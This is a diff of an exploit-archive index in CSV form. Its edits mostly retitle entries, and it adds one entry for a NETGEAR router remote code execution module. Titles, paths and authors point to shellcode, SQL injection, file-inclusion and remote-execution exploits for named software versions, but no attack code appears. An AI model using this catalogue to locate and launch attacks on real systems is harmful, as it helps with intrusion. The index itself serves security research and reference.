Research",linux,remote,0 40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0 40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0 +40949,platforms/cgi/remote/40949.rb,"NETGEAR WNR2000v5 - Remote Code Execution",2016-12-21,"Pedro Ribeiro",cgi,remote,80 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15219,8 +15222,8 @@ id,file,description,date,author,platform,type,port 13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0 13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0 13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0 -13282,platforms/generator/shellcode/13282.php,"Linux/x86 - portbind payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 -13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - portbind payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 +13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Portbind Payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 +13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Portbind Payload Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic Shellcode with printable ASCII characters",2008-08-31,sorrow,generator,shellcode,0 13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0 13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode Encoder/Decoder",2008-08-04,"Avri Schneider",generator,shellcode,0 @@ -15707,7 +15710,7 @@ id,file,description,date,author,platform,type,port 38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0 38126,platforms/osx/shellcode/38126.c,"OSX/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0 -38194,platforms/android/shellcode/38194.c,"Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0 +38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0 38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bindshell 31173 port with Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0 @@ -15987,7 +15990,7 @@ id,file,description,date,author,platform,type,port 1363,platforms/php/webapps/1363.php,"Website Baker 2.6.0 - Login Bypass / Remote Code Execution",2005-12-08,rgod,php,webapps,0 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0 1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit",2005-12-10,rgod,php,webapps,0 -1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - (phpcoinsessid) SQL Inj / Remote Code Execution",2005-12-12,rgod,php,webapps,0 +1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0 1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - _SERVER[REMOTE_ADDR] Overwrite Remote Exploit",2005-12-14,rgod,php,webapps,0 1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Arbitrary Remote Code Execution",2005-12-20,rgod,php,webapps,0 1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0 @@ -16055,7 +16058,7 @@ id,file,description,date,author,platform,type,port 1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - 'cookie' Final SQL Injection (mq=off)",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection",2006-03-01,nukedx,php,webapps,0 1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 -1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities (PoC)",2006-03-02,lorenzo,php,webapps,0 +1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,php,webapps,0 1548,platforms/php/webapps/1548.pl,"MyBulletinBoard (MyBB) 1.04 - 'misc.php' SQL Injection (2)",2006-03-03,Devil-00,php,webapps,0 1549,platforms/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0 1550,platforms/asp/webapps/1550.txt,"TotalECommerce 1.0 - (index.asp id) SQL Injection",2006-03-04,nukedx,asp,webapps,0 @@ -16503,13 +16506,13 @@ id,file,description,date,author,platform,type,port 2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - 'User-Agent' SQL Injection",2006-08-23,rgod,php,webapps,0 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - (start) SQL Injection",2006-08-23,SpiderZ,php,webapps,0 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0 -2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 +2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 2251,platforms/php/webapps/2251.pl,"VistaBB 2.x - (functions_mod_user.php) Remote File Inclusion",2006-08-23,nukedx,php,webapps,0 2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,php,webapps,0 2253,platforms/php/webapps/2253.php,"Phaos 0.9.2 - basename() Remote Command Execution",2006-08-24,Kacper,php,webapps,0 2254,platforms/php/webapps/2254.txt,"PHPCOIN 1.2.3 - (session_set.php) Remote File Inclusion",2006-08-24,Timq,php,webapps,0 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0 -2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 +2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - 'phpbb_root_path' Parameter Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 2259,platforms/php/webapps/2259.txt,"ProManager 0.73 - 'note.php' SQL Injection",2006-08-26,Kacper,php,webapps,0 2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - 'PSA_PATH' Parameter Remote File Inclusion",2006-08-27,Kacper,php,webapps,0 @@ -16658,7 +16661,7 @@ id,file,description,date,author,platform,type,port 2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - (fs_form_links.php) File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2435,platforms/php/webapps/2435.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (1)",2006-09-26,ThE-WoLf-KsA,php,webapps,0 2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - 'menu.php' Remote File Inclusion",2006-09-26,Drago84,php,webapps,0 -2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion",2006-09-26,Kacper,php,webapps,0 +2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - 'class.mysql.php' Remote File Inclusion",2006-09-26,Kacper,php,webapps,0 2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0 2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 @@ -16887,7 +16890,7 @@ id,file,description,date,author,platform,type,port 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion",2006-11-06,the_day,php,webapps,0 -2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion",2006-11-06,the_day,php,webapps,0 +2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection (1)",2006-11-06,Liz0ziM,php,webapps,0 2731,platforms/php/webapps/2731.pl,"iPrimal Forums - 'admin/index.php' Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 @@ -16931,9 +16934,9 @@ id,file,description,date,author,platform,type,port 2778,platforms/php/webapps/2778.txt,"PHPPeanuts 1.3 Beta - (Inspect.php) Remote File Inclusion",2006-11-14,"Hidayat Sagita",php,webapps,0 2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass (SQL Injection)",2006-11-14,ajann,asp,webapps,0 2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - (page.asp) SQL Injection",2006-11-14,ajann,asp,webapps,0 -2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - (Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2006-11-14,"Security Access Point",asp,webapps,0 +2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - Cross-Site Scripting / Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 -2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - (Arbitrary File Create/ Execute / Delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0 +2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - Arbitrary File Create/ Execute/Delete",2006-11-15,r0ut3r,php,webapps,0 2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - (manager/index.php) Local File Inclusion",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0 2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - (apx_root_path) Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps,0 @@ -16992,7 +16995,7 @@ id,file,description,date,author,platform,type,port 2877,platforms/php/webapps/2877.txt,"Invision Community Blog Mod 1.2.4 - SQL Injection",2006-12-01,anonymous,php,webapps,0 2878,platforms/php/webapps/2878.txt,"ContentServ 4.x - (admin/FileServer.php) File Disclosure",2006-12-01,qobaiashi,php,webapps,0 2881,platforms/asp/webapps/2881.txt,"Ultimate HelpDesk - Cross-Site Scripting / Local File Disclosure",2006-12-01,ajann,asp,webapps,0 -2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - (Full Path Disclosure / File Inclusion) Multiple Vulnerabilities",2006-12-02,y3dips,php,webapps,0 +2882,platforms/php/webapps/2882.txt,"BBS E-Market Professional - Full Path Disclosure / File Inclusion",2006-12-02,y3dips,php,webapps,0 2883,platforms/php/webapps/2883.txt,"simple file manager 0.24a - Multiple Vulnerabilities",2006-12-02,flame,php,webapps,0 2884,platforms/php/webapps/2884.txt,"awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion",2006-12-02,DeltahackingTEAM,php,webapps,0 2885,platforms/php/webapps/2885.txt,"mxBB Module mx_tinies 1.3.0 - Remote File Inclusion",2006-12-02,bd0rk,php,webapps,0 @@ -17083,7 +17086,7 @@ id,file,description,date,author,platform,type,port 3007,platforms/php/webapps/3007.txt,"Irokez Blog 0.7.1 - Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion",2006-12-25,DeltahackingTEAM,php,webapps,0 3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 -3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 +3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Parameter Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - (ataturk.php) Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Arbitrary File Upload / Code Execution",2006-12-25,CorryL,php,webapps,0 @@ -17130,9 +17133,9 @@ id,file,description,date,author,platform,type,port 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection",2007-01-04,ajann,asp,webapps,0 3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - (user.php id Variable) SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 -3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - (Code Execution / SQL Injection) Multiple Vulnerabilities",2007-01-05,"Michael Brooks",php,webapps,0 +3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 -3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 +3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 3090,platforms/php/webapps/3090.txt,"NUNE News Script 2.0pre2 - Multiple Remote File Inclusion",2007-01-06,"Mehmet Ince",php,webapps,0 3091,platforms/php/webapps/3091.php,"L2J Statistik Script 0.09 - 'index.php' Local File Inclusion",2007-01-07,Codebreak,php,webapps,0 3093,platforms/php/webapps/3093.txt,"AllMyGuests 0.3.0 - 'AMG_serverpath' Parameter Remote File Inclusion",2007-01-07,beks,php,webapps,0 @@ -17148,7 +17151,7 @@ id,file,description,date,author,platform,type,port 3109,platforms/php/webapps/3109.php,"WordPress 2.0.6 - 'wp-trackback.php' SQL Injection",2007-01-10,rgod,php,webapps,0 3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion",2007-01-10,irvian,php,webapps,0 3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0 -3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0 +3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - SQL Injection / Cross-Site Scripting",2007-01-11,ajann,asp,webapps,0 3116,platforms/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Execution",2007-01-12,rgod,php,webapps,0 3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - (show.php PollDir) Remote File Inclusion",2007-01-12,"ilker Kandemir",php,webapps,0 3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - (i-accueil.php chemin) Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 @@ -17190,7 +17193,7 @@ id,file,description,date,author,platform,type,port 3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - SQL Injection",2007-01-25,ajann,asp,webapps,0 3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - (print.asp) SQL Injection",2007-01-25,ajann,asp,webapps,0 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0 -3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-01-25,ajann,asp,webapps,0 +3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - SQL Injection / Cross-Site Scripting",2007-01-25,ajann,asp,webapps,0 3198,platforms/php/webapps/3198.txt,"Virtual Path 1.0 - (vp/configure.php) Remote File Inclusion",2007-01-25,GoLd_M,php,webapps,0 3201,platforms/php/webapps/3201.txt,"MyPHPcommander 2.0 - (package.php) Remote File Inclusion",2007-01-26,"Cold Zero",php,webapps,0 3202,platforms/php/webapps/3202.txt,"AINS 0.02b - (ains_main.php ains_path) Remote File Inclusion",2007-01-26,"ThE dE@Th",php,webapps,0 @@ -17250,7 +17253,7 @@ id,file,description,date,author,platform,type,port 3280,platforms/php/webapps/3280.txt,"AgerMenu 0.01 - (top.inc.php rootdir) Remote File Inclusion",2007-02-07,GoLd_M,php,webapps,0 3281,platforms/php/webapps/3281.txt,"WebMatic 2.6 - (index_album.php) Remote File Inclusion",2007-02-07,MadNet,php,webapps,0 3282,platforms/php/webapps/3282.pl,"Advanced Poll 2.0.5-dev - Remote Admin Session Generator Exploit",2007-02-07,diwou,php,webapps,0 -3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-02-07,GregStar,php,webapps,0 +3283,platforms/php/webapps/3283.txt,"otscms 2.1.5 - SQL Injection / Cross-Site Scripting",2007-02-07,GregStar,php,webapps,0 3284,platforms/php/webapps/3284.txt,"Maian Recipe 1.0 - 'path_to_folder' Parameter Remote File Inclusion",2007-02-07,Denven,php,webapps,0 3285,platforms/php/webapps/3285.htm,"Site-Assistant 0990 - (paths[version]) Remote File Inclusion",2007-02-08,ajann,php,webapps,0 3286,platforms/php/webapps/3286.asp,"LightRO CMS 1.0 - (index.php projectid) SQL Injection",2007-02-08,ajann,php,webapps,0 @@ -17292,7 +17295,7 @@ id,file,description,date,author,platform,type,port 3346,platforms/php/webapps/3346.pl,"PHP-Nuke 8.0 Final - (HTTP Referers) SQL Injection",2007-02-20,krasza,php,webapps,0 3348,platforms/php/webapps/3348.txt,"SendStudio 2004.14 - (ROOTDIR) Remote File Inclusion",2007-02-20,K-159,php,webapps,0 3351,platforms/php/webapps/3351.pl,"webSPELL 4.01.02 - (topic) SQL Injection",2007-02-21,DNX,php,webapps,0 -3352,platforms/php/webapps/3352.php,"Connectix Boards 0.7 - (p_skin) Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 +3352,platforms/php/webapps/3352.php,"Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities",2007-02-21,DarkFig,php,webapps,0 3353,platforms/php/webapps/3353.txt,"DBImageGallery 1.2.2 - (donsimg_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0 3354,platforms/php/webapps/3354.txt,"DBGuestbook 1.1 - (dbs_base_path) Remote File Inclusion",2007-02-21,Denven,php,webapps,0 3355,platforms/php/webapps/3355.php,"Nabopoll 1.2 - (result.php surv) Blind SQL Injection",2007-02-21,s0cratex,php,webapps,0 @@ -17360,7 +17363,7 @@ id,file,description,date,author,platform,type,port 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - 'functions_dir' Parameter Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0 3489,platforms/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 -3490,platforms/php/webapps/3490.txt,"wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0 +3490,platforms/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",php,webapps,0 3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 3493,platforms/asp/webapps/3493.txt,"Absolute Image Gallery 2.0 - (gallery.asp categoryId) SQL Injection",2007-03-15,WiLdBoY,asp,webapps,0 3494,platforms/php/webapps/3494.txt,"McGallery 0.5b - 'download.php' Arbitrary File Download",2007-03-15,Piker,php,webapps,0 @@ -17424,7 +17427,7 @@ id,file,description,date,author,platform,type,port 3583,platforms/php/webapps/3583.txt,"C-Arbre 0.6PR7 - 'ROOT_PATH' Remote File Inclusion",2007-03-26,K-159,php,webapps,0 3588,platforms/php/webapps/3588.pl,"XOOPS module Articles 1.02 - (print.php id) SQL Injection",2007-03-27,WiLdBoY,php,webapps,0 3590,platforms/php/webapps/3590.htm,"Joomla! Component D4JeZine 2.8 - Blind SQL Injection",2007-03-27,ajann,php,webapps,0 -3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) Remote File Inclusion",2007-03-27,"ThE TiGeR",php,webapps,0 +3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - 'mysql.php' Remote File Inclusion",2007-03-27,"ThE TiGeR",php,webapps,0 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion",2007-03-27,kezzap66345,php,webapps,0 3594,platforms/php/webapps/3594.pl,"XOOPS module Articles 1.03 - (index.php cat_id) SQL Injection",2007-03-28,ajann,php,webapps,0 3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - 'header.php' Remote File Inclusion",2007-03-28,GoLd_M,php,webapps,0 @@ -17516,7 +17519,7 @@ id,file,description,date,author,platform,type,port 3722,platforms/php/webapps/3722.txt,"Expow 0.8 - (autoindex.php cfg_file) Remote File Inclusion",2007-04-12,mdx,php,webapps,0 3723,platforms/php/webapps/3723.txt,"Request It 1.0b - (index.php id) Remote File Inclusion",2007-04-12,hackberry,php,webapps,0 3725,platforms/php/webapps/3725.php,"Chatness 2.5.3 - (options.php/save.php) Remote Code Execution",2007-04-12,Gammarays,php,webapps,0 -3729,platforms/php/webapps/3729.txt,"Quick and Dirty Blog (qdblog) 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0 +3729,platforms/php/webapps/3729.txt,"Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion",2007-04-13,Omni,php,webapps,0 3731,platforms/php/webapps/3731.php,"Frogss CMS 0.7 - SQL Injection",2007-04-13,Kacper,php,webapps,0 3732,platforms/php/webapps/3732.txt,"Garennes 0.6.1 - (repertoire_config) Remote File Inclusion",2007-04-13,GoLd_M,php,webapps,0 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0 @@ -17585,7 +17588,7 @@ id,file,description,date,author,platform,type,port 3835,platforms/php/webapps/3835.txt,"PostNuke Module v4bJournal - SQL Injection",2007-05-02,"Ali Abbasi",php,webapps,0 3837,platforms/php/webapps/3837.txt,"phpChess Community Edition 2.0 - Multiple Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 3838,platforms/php/webapps/3838.txt,"Open Translation Engine (OTE) 0.7.8 - (header.php ote_home) Remote File Inclusion",2007-05-03,GoLd_M,php,webapps,0 -3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - (index.php bus) SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 +3839,platforms/php/webapps/3839.txt,"PHP Coupon Script 3.0 - 'bus' Parameter SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3840,platforms/php/webapps/3840.txt,"Pre Classifieds Listings 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3841,platforms/php/webapps/3841.txt,"Pre News Manager 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 3842,platforms/php/webapps/3842.txt,"Pre Shopping Mall 1.0 - SQL Injection",2007-05-03,"Mehmet Ince",php,webapps,0 @@ -17646,7 +17649,7 @@ id,file,description,date,author,platform,type,port 3932,platforms/php/webapps/3932.pl,"XOOPS Module Glossarie 1.7 - 'sid' SQL Injection",2007-05-15,ajann,php,webapps,0 3933,platforms/php/webapps/3933.pl,"XOOPS Module MyConference 1.0 - 'index.php' SQL Injection",2007-05-15,ajann,php,webapps,0 3935,platforms/php/webapps/3935.txt,"Glossword 1.8.1 - custom_vars.php Remote File Inclusion",2007-05-16,BeyazKurt,php,webapps,0 -3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 +3936,platforms/asp/webapps/3936.txt,"runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities",2007-05-16,kerem125,asp,webapps,0 3941,platforms/php/webapps/3941.txt,"PHPGlossar 0.8 - (format_menue) Remote File Inclusion",2007-05-16,kezzap66345,php,webapps,0 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - 'newnr' Parameter SQL Injection",2007-05-16,Silentz,php,webapps,0 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0 @@ -17730,7 +17733,7 @@ id,file,description,date,author,platform,type,port 4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion",2007-06-21,Kw3[R]Ln,php,webapps,0 4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 -4092,platforms/php/webapps/4092.txt,"NetClassifieds - (SQL Injection / Cross-Site Scripting / Full Path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié",php,webapps,0 +4092,platforms/php/webapps/4092.txt,"NetClassifieds - SQL Injection / Cross-Site Scripting / Full Path",2007-06-22,"laurent gaffié",php,webapps,0 4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - (index.php ID) SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution",2007-06-24,DarkFig,php,webapps,0 4097,platforms/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0 @@ -17738,7 +17741,7 @@ id,file,description,date,author,platform,type,port 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0 4100,platforms/php/webapps/4100.txt,"phpTrafficA 1.4.2 - (pageid) SQL Injection",2007-06-24,"laurent gaffié",php,webapps,0 